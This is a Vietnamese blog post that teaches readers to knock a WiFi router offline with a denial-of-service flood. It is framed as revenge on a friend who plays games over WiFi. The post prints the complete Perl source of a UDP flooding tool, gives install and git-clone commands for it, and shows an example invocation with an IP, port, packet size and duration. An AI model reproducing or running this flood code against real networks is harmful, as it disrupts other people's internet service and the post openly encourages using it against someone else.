thực hành kĩ thuật tấn công dos ( not ddos ) router wifi đơn giản
xin chào các ông qua trở lại 👋 với chen nồ codechui của muối blog. như các ông đã biết, thời đại kĩ thuật số phát triển như hiện nay, nhà nhà người người sử dụng internet, và internet đã trở thành thứ gì đó vô cùng quan trọng với con người thế kỉ 21 khi mà đến cả đứa trẻ con 4 tuổi thay vì chạy nhảy đi chơi thì bây giờ niềm đam mê và tình yêu của nó đã giành cho internet. thiếu internet thì các ông đủ hiểu là thế nào rồi nhỉ.vậy thì tui đặt ra tình huống giả định như này, ông và thằng tèo là vừa xảy ra xích mích không lớn nhưng cũng đủ, và ông biết được thằng tèo nó rất mê game, mà nó lại mê game mobile nữa chứ. ấy, mà nó không dùng mạng di động mà thay vào đó dùng wifi để chơi game, perfect, gì nữa, gì nữa, và ông biết được nó sẽ phát điên lên nếu mạng internet chập chờn khi nó đang chơi. done, ông nghĩ 'làm thế nào để hack sập wifi', và ông lên google ông search 'cách hack sập wifi', và ... bài viết của tôi hiện ra, chuỗi ngày buồn của tèo bắt đầu, chia buồn với tèo.😐
hiểu về phương thức làm việc
không cần phải tham gia kết nối vào mạng wifi đó, vậy thì cuộc tấn công là khả thi? hoàn toàn khả thi các ông ạ mà kết nối được vào thì càng tốt chứ sao, các ông hãy biết rằng. router:bộ định tuyến luôn phát ra những tín hiệu 'gọi mời' có chứa các thông tin ssid:nôm na là các tên wifi đó, nhờ các lời gợi mời như này mà khi ông vào vùng phủ sóng thì máy của ông mới xuất hiện thông tin wifi đó. và khi ông muốn kết nối với mạng wifi này, ông sẽ gửi một(s) request mang lời chào thân thiện có chứa password tới router để nó kiểm chứng, xác thực và bắt đầu trao đổi với thiết bị của các ông.🙌vậy việc của các ông là gì, ta không cần phải biết password, ta chỉ cần gửi liên tục các request tới router để nó xử lí, mà với một bộ router thì bộ nhớ khả kiến là hạn chế, do đó việc các ông gửi hàng loạt các request như vậy sẽ chiếm dụng toàn bộ:đa số bộ nhớ và làm mất:hạn chế khả năng xử lí của router - sập:nghẽn router. gây ra một vụ dos router. hậu quả là sập:nghẽn mạng.
thực hành tấn công dos router
à. các ông lưu ý là bài thực hành dưới đây áp dụng với các router mà ta đã kết nối tới hé.👺công cụ cứng các ông cần
/ một router của chính các ông
/ một máy tính chạy linux hoặc termux hoặc gì cũng được miễn nó hỗ trợ ngôn ngữ lập trình perl.
các thông tin cần thiết
/ ip của router ông sẽ thực hành
cài đặt công cụ thực hành
công cụ này cực kì nhỏ gọn nhẹ nhàng mà khả năng của nó cũng thuộc dạng tầm trung, đủ để sử dụng cho bài thực hành hôm nay. đây là code của em nó các ông có thể tham khảo.
#!/usr/bin/perl
#Args
# 1 - IP
# 2 - Port
# 3 - Size of the packet to send
# 4 - Time in secondes
use Socket;
use strict;
if ($#ARGV != 3) {
print "-Tip on use : perl DDoS.pl 8.8.8.8 80 2048 500\n";
exit(1);
}
my ($ip,$port,$size,$time) = @ARGV;
my ($iaddr,$endtime,$psize,$pport);
$iaddr = inet_aton("$ip") or die "Cannot connect to $ip\n";
$endtime = time() + ($time ? $time : 1000000);
socket(flood, PF_INET, SOCK_DGRAM, 17);
print "~To cancel the attack press \'Ctrl-C\'\n\n";
print "|IP|\t\t |Port|\t\t |Size|\t\t |Time|\n";
print "|$ip|\t |$port|\t\t |$size|\t\t |$time|\n";
print "To cancel the attack press 'Ctrl-C'\n" unless $time;
for (;time() <= $endtime;) {
$psize = $size ? $size : int(rand(1500-64)+64) ;
$pport = $port ? $port : int(rand(65500))+1;
send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport, $iaddr));}
ông nào thích sự rườm ra thì có thể copy code trên lưu vào một file với định dạng đuôi là .pl, sau đó dùng terminal để di chuyển đến thư mục chứa file các ông vừa lưuông nào thích sự tinh tế thì chạy đoạn code sau [ áp dụng cho cả termux lẫn linux - một số yêu cầu chạy dưới quyền sudo thì các ông cứ nhập sudo vào phía trước mỗi lệnh]
apt install perl
apt install git
git clone https://github.com/gillesdubois/simplePerlDDoS
cd
simplePerlDDoS
perl DDos.pl
bắt đầu thực hànhcác ông sẽ chạy công cụ dưới cấu trúc lệnh sau
perl ddos.perl <router-ip> <port> <bytes> <time>
trong đó<port> là cổng mở của router. thông thường các ông cứ sử dụng post 80
<bytes> là kích thước của một gói tin sẽ request tới, các ông hãy dùng 2048
<time> là thời gian kết thúc, tính bằng giây
ví dụ, tui sẽ dos router có địa chỉ ip là 1.1.1.1, port 80, kích thước một request là 2048 và kết thúc sau 100 giây thì tớ sẽ sử dụng
perl ddos.perl 1.1.1.1 80 2048 100
Đây chỉ là bài đơn giản, hãy đón xem các bài viết tiếp theo với mức độ nguy hiểm tiếp theo, hớ hớ 💗
🤪 Cảm ơn đã đọc bài viết của tớ ! Có thể rằng tâm hồn của chúng ta không đồng đều trong từng nhịp điệu của tri thức nhưng chắc chắn rằng chúng ta đang bồi đắp chung một gốc cây 🎋